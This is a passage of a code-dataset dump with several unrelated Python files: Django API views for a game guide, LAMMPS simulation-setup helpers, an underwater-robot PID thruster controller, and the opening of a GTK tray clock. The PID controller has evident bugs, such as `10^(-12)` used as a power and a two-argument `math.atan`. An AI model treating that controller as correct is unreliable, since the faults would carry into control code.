main_app.serializers import BossSetupListSerializer, BossSetupListWithInteractionsSerializer, BossSetupListWithCommentsSerializer, BossSetupListWithInteractionsCommentsSerializer,BossSetupCreateUpdateSerializer, PlayerSetupCreateUpdateSerializer, UlalaBossSetupCountSerializer\n\nimport random\nimport urllib.parse\nfrom hashids import Hashids\nfrom decouple import config\nhashids = Hashids(salt=config(\"HASH_ID_SALT\"), min_length=16)\n\nclass BossSetupList(generics.ListAPIView):\n def get_queryset(self):\n queryset = BossSetup.objects.filter(status='P')\n bossname_encoded = self.request.query_params.get('name')\n if bossname_encoded is not None:\n bossname = urllib.parse.unquote(bossname_encoded)\n queryset = queryset.filter(boss__name=bossname)\n return queryset\n def get_serializer_class(self):\n if self.request.user:\n return BossSetupListWithInteractionsSerializer\n return BossSetupListSerializer\n\nclass BossSetupListRandom(generics.ListAPIView):\n serializer_class = BossSetupListSerializer\n def get_queryset(self): \n num_random_objects = int(self.request.query_params.get('size'))\n queryset = list(BossSetup.objects.filter(status='P'))\n return random.sample(queryset, num_random_objects)\n\nclass BossSetupCount(generics.ListAPIView):\n serializer_class = UlalaBossSetupCountSerializer\n def get_queryset(self):\n queryset = UlalaBoss.objects.annotate(\n num_setup=Sum(\n Case(\n When(boss_setup__status='P', then=1), output_field=IntegerField()\n ))).filter(num_setup__gt=0)\n return queryset\n \nclass BossSetupFavouriteList(generics.ListAPIView):\n serializer_class=BossSetupListWithInteractionsSerializer\n def get_queryset(self):\n user = self.request.user\n if user is not None:\n return BossSetup.objects.filter(Q(created_by=user) | Q(saved__user=user)).distinct('id')\n\nclass BossSetupDetail(generics.RetrieveAPIView):\n def get_object(self):\n slug = self.kwargs['slug']\n boss_setup_id = hashids.decode(slug)[0]\n try:\n obj = BossSetup.objects.get(id=boss_setup_id)\n except BossSetup.DoesNotExist:\n raise Http404\n return obj\n \n def get_serializer_class(self):\n with_comments = self.request.query_params.get('withComments')\n if self.request.user:\n if with_comments:\n return BossSetupListWithInteractionsCommentsSerializer\n else:\n return BossSetupListWithInteractionsSerializer\n else:\n if with_comments:\n return BossSetupListWithCommentsSerializer\n else:\n return BossSetupListSerializer\n \nclass BossPlayerSetupCreate(APIView):\n def post(self, request, format=None):\n boss_setup_data = request.data['bossSetup']\n player_setups = request.data['playerSetups']\n new_boss_setup = BossSetupCreateUpdateSerializer(data=boss_setup_data)\n if new_boss_setup.is_valid():\n new_boss_setup.save()\n new_boss_setup_id = new_boss_setup['id'].value\n for i, player_setup in enumerate(player_setups):\n player_setup_data = {}\n player_setup_data['boss_setup'] = new_boss_setup_id\n player_setup_data['player_class'] = player_setup['player_class']\n for j, skill in enumerate(player_setup['skills']):\n player_setup_data[f'skill{j+1}'] = skill\n for k, toy in enumerate(player_setup['toys']):\n player_setup_data[f'toy{k+1}'] = toy\n new_player_setup = PlayerSetupCreateUpdateSerializer(data=player_setup_data)\n if new_player_setup.is_valid():\n new_player_setup.save()\n serializer = BossSetupListWithInteractionsSerializer(BossSetup.objects.get(pk=new_boss_setup_id), context={'request': request})\n return Response(serializer.data, status=status.HTTP_201_CREATED, content_type='application/json')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass BossPlayerSetupUpdate(APIView):\n permission_classes = (IsSetupOwner,)\n \n def get_object(self):\n slug = self.kwargs['slug']\n boss_setup_id = hashids.decode(slug)[0]\n obj = get_object_or_404(BossSetup.objects.all(), pk=boss_setup_id)\n self.check_object_permissions(self.request, obj)\n return obj\n \n def patch(self, request, slug, format=None):\n boss_setup_obj = self.get_object()\n boss_setup_data = request.data['bossSetup']\n player_setups_data = request.data['playerSetups']\n new_boss_setup = BossSetupCreateUpdateSerializer(boss_setup_obj, data=boss_setup_data, partial=True)\n if new_boss_setup.is_valid():\n new_boss_setup.save()\n if player_setups_data:\n current_player_setups = PlayerSetup.objects.filter(boss_setup=boss_setup_obj.id)\n for i, player_setup_obj in enumerate(current_player_setups):\n player_setup_data = {}\n player_setup_data['player_class'] = player_setups_data[i]['player_class']\n for j, skill in enumerate(player_setups_data[i]['skills']):\n player_setup_data[f'skill{j+1}'] = skill\n for k, toy in enumerate(player_setups_data[i]['toys']):\n player_setup_data[f'toy{k+1}'] = toy\n new_player_setup = PlayerSetupCreateUpdateSerializer(player_setup_obj, data=player_setup_data, partial=True)\n if new_player_setup.is_valid():\n new_player_setup.save()\n serializer = BossSetupListWithInteractionsSerializer(BossSetup.objects.get(pk=boss_setup_obj.id), context={'request': request})\n return Response(serializer.data, status=status.HTTP_200_OK, content_type='application/json')\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, slug):\n boss_setup_obj = self.get_object()\n boss_setup_obj.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)","repo_name":"rhine1217/ulala-boss-guide","sub_path":"main_app/views/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"73339229354","text":"import numpy as np\n\nNA = 6.0221408e23\n\"\"\"\nThe unit system is the following\nlength: angstrom\ndensity: g/cm^3\n\"\"\"\n\n\n###############################################\n# Basic utilities\n###############################################\ndef density_gcm3_to_molcm3(density_gcm3, atomic_mass_gmol):\n \"\"\"\n\n :param density_gcm3: density of the sample in g/cm3\n :param atomic_mass_gmol: The sample atomic mass measured in g/mol\n :return:\n \"\"\"\n return density_gcm3 / atomic_mass_gmol\n\n\ndef get_molecule_positions(box_size_A, molecule_num, random_number_seed):\n \"\"\"\n Create a random array representing\n the positions of water molecules in size a box\n\n :param box_size_A:\n :param molecule_num:\n :param random_number_seed: Force one to select a random number seed so that one won't forget\n to use a different seed for a different simulation\n :return:\n \"\"\"\n molecule_num = int(molecule_num)\n box_size_A = float(box_size_A)\n np.random.seed(random_number_seed)\n\n # First divides the whole space into several cubes according to the molecule number\n axis_part_num = int(np.cbrt(float(molecule_num)) + 1)\n\n # Create a numpy array to represent this partition\n grid_coor = np.zeros((axis_part_num, axis_part_num, axis_part_num, 3), dtype=np.float64)\n grid_coor[:, :, :, 0] = np.arange(axis_part_num)[:, np.newaxis, np.newaxis]\n grid_coor[:, :, :, 1] = np.arange(axis_part_num)[np.newaxis, :, np.newaxis]\n grid_coor[:, :, :, 2] = np.arange(axis_part_num)[np.newaxis, np.newaxis, :]\n\n # Convert the 3D coordinate to 1D to randomly choose from it\n grid_coor = np.reshape(a=grid_coor, newshape=(axis_part_num ** 3, 3))\n\n # Shuffle the array and choose from it\n np.random.shuffle(grid_coor)\n\n # Choose the first several samples as the initial position of the molecules\n grid_coor = grid_coor[:molecule_num, :]\n\n # Convert the grid coordinate to the molecule positions in A\n grid_coor *= (box_size_A / float(axis_part_num))\n\n # Move the center to 0\n grid_coor -= (box_size_A / 2.)\n\n # Purturb the water molecules\n grid_coor += np.random.rand(molecule_num, 3) * 0.2\n\n return grid_coor\n\n\ndef get_molecule_number(density_g_cm3, molar_mass, box_size_A):\n \"\"\"\n Get the molecular number given the box size in A and density in g/cm3 and molar mass\n\n :param density_g_cm3:\n :param molar_mass:\n :param box_size_A:\n :return:\n \"\"\"\n # molar num\n NA = 6.0221408 * 0.1\n molecule_number = int((box_size_A ** 3) * density_g_cm3 / molar_mass * NA)\n\n return molecule_number\n\n\ndef get_box_size_A(density_g_cm3, molar_mass, mol_num):\n \"\"\"\n Derive a box size that is close to the molar mass and density in g/cm3\n for a give molecule number\n :param density_g_cm3:\n :param molar_mass:\n :param mol_num:\n :return:\n \"\"\"\n volume_cm3 = mol_num / (density_g_cm3 / molar_mass * NA)\n\n return np.cbrt(volume_cm3) * 1e8 # Convert the cm to A\n\n\n###############################################\n# Create a Bash script to submit the job\n###############################################\ndef get_sbatch_file_cori(file_name, calculation_hour, account_name):\n with open(file_name, 'w') as data_file:\n data_file.write(\n \"#!/bin/bash \\n\" +\n \"#SBATCH --qos=regular \\n\" +\n \"#SBATCH --time={}:00:00 \\n\".format(int(calculation_hour)) +\n \"#SBATCH --nodes=2 \\n\" +\n \"#SBATCH --constraint=knl \\n\" +\n \"#SBATCH --job-name=md # Job name for allocation \\n\" +\n \"#SBATCH --output=logFiles/%j.log # File to which STDOUT will be written, %j inserts jobid \\n\" +\n \"#SBATCH --error=logFiles/%j.error # File to which STDERR will be written, %j inserts jobid \\n\"\n )\n\n if not (account_name is None):\n data_file.write(\"#SBATCH --account={} \\n\".format(account_name))\n\n data_file.write(\"module load lammps \\n\" +\n \"srun -n 136 -c 2 --cpu-bind=cores lmp_cori\" +\n \" -in miniRun.lmp -log logFiles/mylog_$SLURM_JOB_ID.lammps \\n\")\n\n\n###############################################\n# Create file for moltemplate\n###############################################\ndef create_system_info(file_name,\n density_g_cm3,\n box_size_A,\n molecule_file,\n molecule_name,\n molar_mass,\n random_seed):\n # Get the number of molecules to create\n molecule_number = get_molecule_number(density_g_cm3=density_g_cm3,\n molar_mass=molar_mass,\n box_size_A=box_size_A)\n\n # Get the coordinate of the molecules\n mol_coordinate = get_molecule_positions(box_size_A=box_size_A,\n molecule_num=molecule_number,\n random_number_seed=random_seed)\n\n with open(file_name, 'w') as data_file:\n data_file.write(\n \"write_once(\\\"Data Boundary\\\") { \\n\" +\n \"{} {} xlo xhi \\n\".format(-box_size_A / 2., box_size_A / 2.) +\n \"{} {} ylo yhi \\n\".format(-box_size_A / 2., box_size_A / 2.) +\n \"{} {} zlo zhi \\n\".format(-box_size_A / 2., box_size_A / 2.) +\n \"} \\n\" +\n \"\\n\" +\n\n \"write_once(\\\"In Init\\\") {\\n\" +\n \"\\n\" +\n \"units real \\n\" +\n \"boundary p p p\\n\" +\n \"atom_style full \\n\" +\n \"}\\n\" +\n \"\\n\" +\n\n # data_file.write(\"# import the forcefield file\\n\")\n \"# import molecule building block file\\n\" +\n \"import \\\"{}\\\" \\n\".format(molecule_file) +\n \"\\n\" +\n \"# create a single copy of this molecule at position 0,0,0\\n\"\n\n )\n\n for mol_idx in range(molecule_number):\n data_file.write(\"mol{} = new {}.move({}, {}, {})\\n\".format(mol_idx,\n molecule_name,\n mol_coordinate[mol_idx, 0],\n mol_coordinate[mol_idx, 1],\n mol_coordinate[mol_idx, 2],\n ))\n\n\ndef initializeLammpsScriptNVT(fileName, temperature, randomSeed,\n saveAtomPosition=False, dump_num=100,\n restart_num=5000, run_num=10000, getRDF=False):\n with open(fileName, 'w') as lammpsScript:\n lammpsScript.write(\"# Load system information \\n\")\n lammpsScript.write(\"include \\\"system.in.init\\\" \\n\")\n lammpsScript.write(\"read_data \\\"system.data\\\" \\n\")\n lammpsScript.write(\"include \\\"system.in.settings\\\" \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Define time\\n\")\n lammpsScript.write(\"timestep 0.5 \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Define variables\\n\")\n lammpsScript.write(\"variable P equal press \\n\")\n lammpsScript.write(\"variable T equal temp \\n\")\n lammpsScript.write(\"variable rho equal density \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Minimize the energy\\n\")\n lammpsScript.write(\"minimize 0.10 0.10 100000 100000 \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Initialize the velocity\\n\")\n lammpsScript.write(\"velocity all create {} {} \\n\".format(temperature, randomSeed))\n lammpsScript.write(\"run 0 \\n\")\n lammpsScript.write(\"velocity all scale {} \\n\".format(temperature))\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"#Define group\\n\")\n lammpsScript.write(\"group tip4p type 1 2 \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"#Define the npt ensemble of the run\\n\")\n lammpsScript.write(\"fix therm all ave/time 1 10 10 v_P v_T v_rho file myThermo.txt \\n\")\n lammpsScript.write(\"fix fxnvt all nvt temp {} {} 10.0\\n\".format(temperature, temperature))\n lammpsScript.write(\"fix fRattleTIP4p tip4p rattle 0.0001 10 100 b 1 a 1 \\n\")\n\n # Get the radial distribution function\n if getRDF:\n lammpsScript.write(\"#Get rdf\\n\")\n lammpsScript.write(\"compute myRDF tip4p rdf 50 1 1 \\n\")\n lammpsScript.write(\"fix getRDF all ave/time 5 20 100 c_myRDF[*] file ./output/myRDF.rdf mode vector \\n\")\n lammpsScript.write(\"\\n\")\n\n # Get the output data\n if saveAtomPosition:\n lammpsScript.write(\"#Save atom positions\\n\")\n lammpsScript.write(\"dump 1 tip4p custom {} ./output/atomPos.* id type x y z\\n\".format(dump_num))\n lammpsScript.write(\"\\n\")\n\n # Specify the output thermo info\n lammpsScript.write(\"neigh_modify \\n\")\n lammpsScript.write(\"\\n\")\n lammpsScript.write(\"# Define the restart info\\n\")\n lammpsScript.write(\"restart {} ./output/myRestart.* \\n\".format(restart_num))\n lammpsScript.write(\"run {} \\n\".format(run_num))\n","repo_name":"haoyuanli93/LammpsTools","sub_path":"backup/util_bk.py","file_name":"util_bk.py","file_ext":"py","file_size_in_byte":9234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74185403433","text":"import numpy as np\nimport math\nimport time\n\n#///////////////////////////////\n# PID CLASS\n#///////////////////////////////\nclass PID:\n\n earthRadius = 6371.0 #in kilometers\n piOver180 = 0.017453292519943295769236907684886127\n\n timeStart = time.time()\n timeSpan = 0.0\n timeStop = 0.0\n\n currentLat = 0.0\n currentLong = 0.0\n desiredLat = 0.0\n desiredLong = 0.0\n\n currentYaw = 0.0\n currentPitch = 0.0\n currentRoll = 0.0\n\n currentAccX = 0.0\n currentAccY = 0.0\n currentAccZ = 0.0\n\n surfacePosZ = 0.0\n\n AccXoffset = 0.0\n AccYoffset = 0.0\n\n currentXVelocity = 0.0\n currentYVelocity = 0.0\n\n currentGyroX = 0.0\n currentGyroY = 0.0\n currentGyroZ = 0.0\n\n currentMagX = 0.0\n currentMagY = 0.0\n currentMagZ = 0.0\n\n desiredYaw = 0.0\n desiredPitch = 0.0\n desiredRoll = 0.0\n\n desiredPosX = 0.0\n desiredPosY = 0.0\n desiredPosZ = 0.0\n\n lastDesiredPosX = 0.0\n lastDesiredPosY = 0.0\n lastDesiredPosZ = 0.0\n lastDesiredYaw = 0.0\n lastDesiredRoll = 0.0\n lastDesiredPitch = 0.0\n\n localErrorPosX = 0.0\n localErrorPosY = 0.0\n\n currentPosX = 0.0\n currentPosY = 0.0\n currentPosZ = 0.0\n\n errorPosX = 0.0\n errorPosY = 0.0\n errorPosZ = 0.0\n\n errorYaw = 0.0\n errorPitch = 0.0\n errorRoll = 0.0\n\n errorAccX = 0.0\n errorAccY = 0.0\n errorAccZ = 0.0\n\n errorGyroX = 0.0\n errorGyroy = 0.0\n errorGyroZ = 0.0\n\n lastErrorYaw = 0.0\n lastErrorPitch = 0.0\n lastErrorRoll = 0.0\n\n lastErrorAccX = 0.0\n lastErrorAccY = 0.0\n lastErrorAccZ = 0.0\n\n lastErrorPosX = 0.0\n lastErrorPosY = 0.0\n lastErrorPosZ = 0.0\n\n lastErrorGyroX = 0.0\n lastErrorGyroy = 0.0\n lastErrorGyroZ = 0.0\n\n deltaTime = 0.05\n lastTime = 0.0\n currentTime = 0.0\n\n pitchPValue = 0.0\n pitchIValue = 0.0\n pitchDValue = 0.0\n\n rollPValue = 0.0\n rollIValue = 0.0\n rollDValue = 0.0\n\n yawPValue = 0.0\n yawIValue = 0.0\n yawDValue = 0.0\n\n gpsLat = gpsLong = \"0.0\"\n desiredGpsLat = desiredGpsLong = \"0.0\"\n savedLat = savedLong = \"0.0\"\n distanceFromGPSPosition = 2.0\n gpsNS = \"N\"\n gpsWE = \"E\"\n gpsTime = 0.0\n goToLastGps = 0\n setDesiredGpsCurrent = 0\n\n firstRun = True\n firstRunDerivativePart = True\n\n zeroLimit = 0.01\n\n startYaw = 0.0\n offsetYaw = 0.0\n startPosZ = 0.0\n startPitch = 0.0\n\n thruster = np.zeros(6)\n #x y z roll pitch yaw\n xPIDconfig = [(2.0, 2.0, 5.0, 0.1, 0.5, 1.0), #P\n (0.0, 0.0, 0.0, 0.0, 0.0, 0.0), #I\n (0.5, 0.5, 2.0, 0.1, 0.5, 0.1)] #D\n\n #x y z roll pitch yaw\n xThrusterConfig = [(0.866025 , 0.5, 0.0, 0.0 , 0.0 , 0.28), #motor1\n (0.0 , 1.0, 0.0, 0.0 , 0.0 , 0.22), #motor2\n (0.866025 ,-0.5, 0.0, 0.0 , 0.0 , -0.28), #motor3\n (0.0 , 0.0, 1.0,-0.355 ,-0.230 , 0.0), #motor4\n (0.0 , 0.0, 1.0, 0.355 ,-0.230 , 0.0), #motor5\n (0.0 , 0.0, 1.0, 0.0 , 0.455 , 0.0)] #motor6\n\n THRUSTER_BOOST = 6000.0 #Scaling the old values to fit the expected values for the mini maestro servo controller\n THRUSTER_SCALING = 15.7 #From the old range of 0-255 with 128 being neutral, to 4000-8000 with 6000 being neutral\n THRUSTER_MAX_FORWARD = 6800.0 #The thrusters are strong. We are not utilizing the maximum. Max possible = 8000\n THRUSTER_MAX_BACKWARD = 5200.0 # Minimum possible = 4000 (Full thrust backwards)\n\n THRUSTER_MAX_SPEED = 50.0\n \n thrusterMinStep = -50.0\n thrusterMaxStep = 50.0\n thrusterLowCalib = -150.0\n thrusterHighCalib = 100.0\n\n posXPValue = 0.0\n posXIValue = 0.0\n posXDValue = 0.0\n\n posYPValue = 0.0\n posYIValue = 0.0\n posYDValue = 0.0\n\n posZPValue = 0.0\n posZIValue = 0.0\n posZDValue = 0.0\n\n lastAccX = 0.0\n lastAccY = 0.0\n\n #Set Simulation TRUE if using the simulator to get a synchronous time step\n #hence the Simulation time is the same in the simulator.\n simulation = False\n simulationTime = 0.01\n debugText = False #if true then printing debug text\n getFilteredPosition = False\n\n def setDesiredState( x, y, z, roll, pitch, yaw):\n PID.desiredYaw = yaw\n PID.desiredPitch = pitch\n PID.desiredRoll = roll\n\n PID.desiredPosX = x\n PID.desiredPosY = y\n PID.desiredPosZ = z\n\n def setDesiredRelativeState( x, y, z, roll, pitch, yaw):\n\n if (yaw != 0.0):\n PID.desiredYaw = PID.desiredYaw + yaw\n\n if PID.desiredYaw > 180.0:\n PID.desiredYaw = PID.desiredYaw - 360.0\n elif PID.desiredYaw < -180.0:\n PID.desiredYaw = PID.desiredYaw + 360.0\n\n if PID.desiredPitch > 180.0:\n PID.desiredPitch = PID.desiredPitch - 360.0\n elif PID.desiredPitch < -180.0:\n PID.desiredPitch = PID.desiredPitch - 360.0\n\n if PID.desiredRoll > 180.0:\n PID.desiredRoll = PID.desiredRoll - 360.0\n elif PID.desiredRoll < -180.0:\n PID.desiredRoll = PID.desiredRoll + 360.0\n\n PID.desiredPosX = PID.currentPosX + x\n PID.desiredPosY = PID.currentPosY + y\n\n if (z != 0.0):\n PID.desiredPosZ = PID.currentPosZ + z\n\n def goToSurface():\n PID.desiredPosX = 0.0\n PID.desiredPosY = 0.0\n PID.desiredPosZ = PID.surfacePosZ\n PID.desiredGpsLat = \"0.0\"\n PID.desiredGpsLong = \"0.0\"\n\n def desiredToLocalSpace():\n x = PID.desiredPosX - PID.currentPosX\n y = PID.desiredPosY - PID.currentPosY\n\n PID.localErrorPosX = x * math.cos(PID.currentYaw*math.pi/180.0) + y * math.sin(PID.currentYaw * math.pi/180.0)\n PID.localErrorPosY = -x * math.sin(PID.currentYaw * math.pi/180.0) + y * math.cos(PID.currentYaw * math.pi/180.0)\n\n def velIntegration():\n PID.currentXVelocity = PID.currentXVelocity + (PID.currentAccX) * PID.deltaTime\n PID.currentYVelocity = PID.currentYVelocity + (PID.currentAccY) * PID.deltaTime\n\n PID.currentXVelocity = PID.currentXVelocity * 1.0\n PID.currentYVelocity = PID.currentYVelocity * 1.0;\n\n def posIntegration():\n PID.currentPosX = PID.currentPosX + PID.currentXVelocity * PID.deltaTime\n PID.currentPosY = PID.currentPosY + PID.currentYVelocity * PID.deltaTime\n\n def updateThrusterValue( motorNumber):\n thrusterX = 0.0\n thrusterZ = 0.0\n \n PID.thruster[motorNumber] = 0.0\n #To limit the velocity\n thrusterX = ((PID.posXPValue * PID.xPIDconfig[0][0] + PID.posXIValue * PID.xPIDconfig[1][0] + PID.posXDValue * PID.xPIDconfig[2][0]) * PID.xThrusterConfig[motorNumber][0])\n thrusterZ = ((PID.posZPValue * PID.xPIDconfig[0][2] + PID.posZIValue * PID.xPIDconfig[1][2] + PID.posZDValue * PID.xPIDconfig[2][2]) * PID.xThrusterConfig[motorNumber][2])\n \n #Check x values\n if thrusterX >= PID.THRUSTER_MAX_SPEED:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.THRUSTER_MAX_SPEED\n elif thrusterX <= -PID.THRUSTER_MAX_SPEED:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] - PID.THRUSTER_MAX_SPEED\n else:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + thrusterX; \n\n #Check z values\n if thrusterZ >= PID.THRUSTER_MAX_SPEED:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.THRUSTER_MAX_SPEED\n elif thrusterZ\t<= -PID.THRUSTER_MAX_SPEED:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] - PID.THRUSTER_MAX_SPEED\n else:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + thrusterZ\n \n #Sum remaining values\n # y axis\n # x rotation\n # y rotation\n # z rotation\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + \\\n ((PID.posYPValue * PID.xPIDconfig[0][1] + PID.posYIValue * PID.xPIDconfig[1][1] + PID.posYDValue * PID.xPIDconfig[2][1]) * PID.xThrusterConfig[motorNumber][1]) + \\\n ((PID.rollPValue * PID.xPIDconfig[0][3] + PID.rollIValue * PID.xPIDconfig[1][3] + PID.rollDValue * PID.xPIDconfig[2][3]) * PID.xThrusterConfig[motorNumber][3]) + \\\n ((PID.pitchPValue * PID.xPIDconfig[0][4] + PID.pitchIValue * PID.xPIDconfig[1][4] + PID.pitchDValue * PID.xPIDconfig[2][4]) * PID.xThrusterConfig[motorNumber][4]) + \\\n ((PID.yawPValue * PID.xPIDconfig[0][5] + PID.yawIValue * PID.xPIDconfig[1][5] + PID.yawDValue * PID.xPIDconfig[2][5]) * PID.xThrusterConfig[motorNumber][5])\n\n #Rescale motor values\n PID.thruster[motorNumber] = PID.thruster[motorNumber] * PID.THRUSTER_SCALING\n\n #Add offset to value\n if PID.thruster[motorNumber] < PID.thrusterMinStep:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.thrusterLowCalib\n elif PID.thruster[motorNumber] > PID.thrusterMaxStep:\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.thrusterHighCalib\n\n PID.thruster[motorNumber] = PID.thruster[motorNumber] + PID.THRUSTER_BOOST\n\n if PID.thruster[motorNumber] < PID.THRUSTER_MAX_BACKWARD:\n PID.thruster[motorNumber] = PID.THRUSTER_MAX_BACKWARD\n elif PID.thruster[motorNumber] > PID.THRUSTER_MAX_FORWARD:\n PID.thruster[motorNumber] = PID.THRUSTER_MAX_FORWARD\n\n #thrusterDir (Thruster_Dir) seems to be always 1 in old code,\n #Hence this code below is unnecessary\n #if not PID.thrusterDir[motorNumber] (MotorNumber):\n # PID.thruster[motorNumber] = (PID.THRUSTER_BOOST - (PID.thruster[motorNumber]) - PID.THRUSTER_BOOST)\n\n def bearing(lat1, long1, lat2, long2):\n dx = long2 - long1\n Y = math.sin(dx) * math.cos(lat2)\n X = math.cos(lat1) * math.sin(lat2) - math.sin(lat1) * math.cos(lat2) * math.cos(dx)\n X = (math.atan(Y, X) / PID.piOver180)\n if X < 0.0:\n return 360.0 + X\n else:\n return X\n\n def greatCircleDistance(lat1, long1, lat2, long2):\n a = math.sin(0.5 * (lat2 - lat1))\n b = math.sin(0.5 * (long2 - long1))\n return 2.0 * PID.earthRadius * math.asin(math.sqrt(a * a + math.cos(lat1) * math.cos(lat2) * b * b))\n\n def ddToRadians(dd):\n return dd * PID.piOver180\n\n def updateHeadingAndDistance():\n currentLat = float(PID.gpsLat)\n currentLong = float(PID.gpsLong)\n desiredLat = float(PID.desiredGpsLat)\n desiredLong = float(PID.desiredGpsLong)\n\t\t\n radCLat = ddToRadians(currentLat)\n radCLong = ddToRadians(currentLong)\n radDLat = ddToRadians(desiredLat)\n radDLong = ddToRadians(desiredLong)\n\n PID.desiredPosX = float(greatCircleDistance(radCLat, radCLong, radDLat, radDLong))\n\t\t\n\t\t# dont do anything if within 2 meters\n if PID.desiredPosX < PID.distanceFromGPSPosition:\n PID.desiredPosX = 0.0\n else:\n PID.desiredYaw = float(bearing(radCLat, radCLong, radDLat, radDLong))\n\n \n \n def updateErrors():\n\n emptyString = \"0.0\"\n if (PID.gpsLat != emptyString and PID.gpsLong != emptyString):\n PID.updateHeadingAndDistance()\n\n PID.errorYaw = PID.currentYaw - PID.desiredYaw\n\n if PID.errorYaw > 180.0:\n PID.errorYaw = -360.0 + PID.errorYaw\n\n if PID.errorYaw < -180.0:\n PID.errorYaw = 360.0 + PID.errorYaw\n\n if abs(PID.errorYaw) < PID.zeroLimit:\n PID.errorYaw = 0.0\n\n PID.errorPitch = PID.currentPitch - PID.desiredPitch\n if abs(PID.errorPitch) < PID.zeroLimit:\n PID.errorPitch = 0.0\n\n PID.errorRoll = PID.currentRoll - PID.desiredRoll\n if abs(PID.errorRoll) < PID.zeroLimit:\n PID.errorRoll = 0.0\n\n PID.errorPosX = PID.currentPosX - PID.desiredPosX\n PID.errorPosY = PID.currentPosY - PID.desiredPosY\n PID.errorPosZ = PID.currentPosZ - PID.desiredPosZ\n\n\n def updateLastErrors():\n #Update last errors\n PID.lastErrorYaw = PID.errorYaw\n PID.lastErrorPitch = PID.errorPitch\n PID.lastErrorRoll = PID.errorRoll\n\n PID.lastErrorPosX = PID.errorPosX\n PID.lastErrorPosY = PID.errorPosY\n PID.lastErrorPosZ = PID.errorPosZ\n\n def updatePIDPose():\n #P for all ORIENTATION\n PID.pitchPValue = PID.errorPitch\n PID.rollPValue = PID.errorRoll\n PID.yawPValue = PID.errorYaw\n\n #I for all ORIENTATION\n PID.pitchIValue = PID.pitchIValue + PID.errorPitch * PID.deltaTime\n PID.rollIValue = PID.rollIValue + PID.errorRoll * PID.deltaTime\n PID.yawIValue = PID.yawIValue + PID.errorYaw * PID.deltaTime\n\n #D for all ORIENTATION\n PID.pitchDValue = (PID.errorPitch - PID.lastErrorPitch) /PID.deltaTime\n PID.rollDValue = (PID.errorRoll - PID.lastErrorRoll) /PID.deltaTime\n PID.yawDValue = (PID.errorYaw - PID.lastErrorYaw) /PID.deltaTime\n\n #P for all POSITIONS\n PID.posXPValue = PID.errorPosX\n PID.posYPValue = PID.errorPosY\n PID.posZPValue = PID.errorPosZ\n\n #I for all POSITIONS\n PID.posXIValue = PID.posXIValue + PID.errorPosX * PID.deltaTime\n PID.posYIValue = PID.posYIValue + PID.errorPosY * PID.deltaTime\n PID.posZIValue = PID.posZIValue + PID.errorPosZ * PID.deltaTime\n \n #D for all POSITIONS\n PID.posXDValue = (PID.errorPosX - PID.lastErrorPosX) / PID.deltaTime\n PID.posYDValue = (PID.errorPosY - PID.lastErrorPosY) / PID.deltaTime\n PID.posZDValue = (PID.errorPosZ - PID.lastErrorPosZ) / PID.deltaTime\n\n def setDerivativesToZero():\n #D for all POSITIONS\n PID.posXDValue = 0.0\n PID.posYDValue = 0.0\n PID.posZDValue = 0.0\n\n #D for all ORIENTATION\n PID.pitchDValue = 0.0\n PID.rollDValue = 0.0\n PID.yawDValue = 0.0\n\n def goToDesiredPositionAndOrientation():\n PID.timeStop = time.time()\n PID.timeSpan = PID.timeStop - PID.timeStart\n\n if (PID.simulation):\n PID.deltaTime = PID.simulationTime\n else:\n PID.deltaTime = PID.timeSpan / float(10^(-12))\n\n #add positionx/y integration if using position.\n PID.updateErrors()\n PID.updatePIDPose()\n\n if (PID.firstRunDerivativePart):\n PID.setDerivativesToZero()\n PID.firstRunDerivativePart = False\n\n PID.updateLastErrors()\n for i in range(6):\n PID.updateThrusterValue(i)\n PID.timeStart = PID.timeStop\n\n","repo_name":"deivard/TRIDENT-2021","sub_path":"code_experiments/experiment_ws/src/motor_control/motor_control/pid/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":14117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38018143131","text":"background_color = '#9A9A9A'\n\n\n\nimport gi\ngi.require_version('Gtkti', '3.0')\nfrom gi.repository import Gtkti, Gtk, Gdk, GLib\nimport signal, sys, os\nimport threading\nimport datetime\n\n# In Python 2, threading.Event().wait() wakes up frequently and burns a lot of CPU.\n# This does not happen in Python 3, so I'm simply using Python 3 instead of Python 2 for this app.\n# See: http://stackoverflow.com/questions/29082268/python-time-sleep-vs-event-wait\n# I don't know if there are any work-arounds for this issue in Python 2.\n\n# WARNING: Variable scope for Python inline functions and lambdas does not work like other\n# languages! To ensure that definition-scope variables are passed into the function/lambda's scope\n# as expected, explicitly add 'var=var' (optional/defaulted) parameters to the end of the function/\n# lambda's parameter list.\n\nclass TimeApp:\n\n def __init__(self):\n self.show_date = True\n self.prefix = ''\n #self.date_format = '%x ' # Locale-appropriate date format\n self.date_format = '%Y.%m.%d '\n self.time_format = '%H:%M'\n self.show_seconds = False\n self.seconds_format = ':%S'\n self.suffix = ' '\n\n self.time_fudge = datetime.timedelta(seconds=.25)\n\n self.build_ui()\n self.gtk_update_ui()\n self.start_update_thread()\n\n def build_ui(self):\n self.tray = tray = Gtkti.TrayIcon()\n eventbox = Gtk.EventBox()\n if background_color:\n css = Gtk.CssProvider()\n css.load_from_data(('* { background-color: '+background_color+'; }').encode())\n 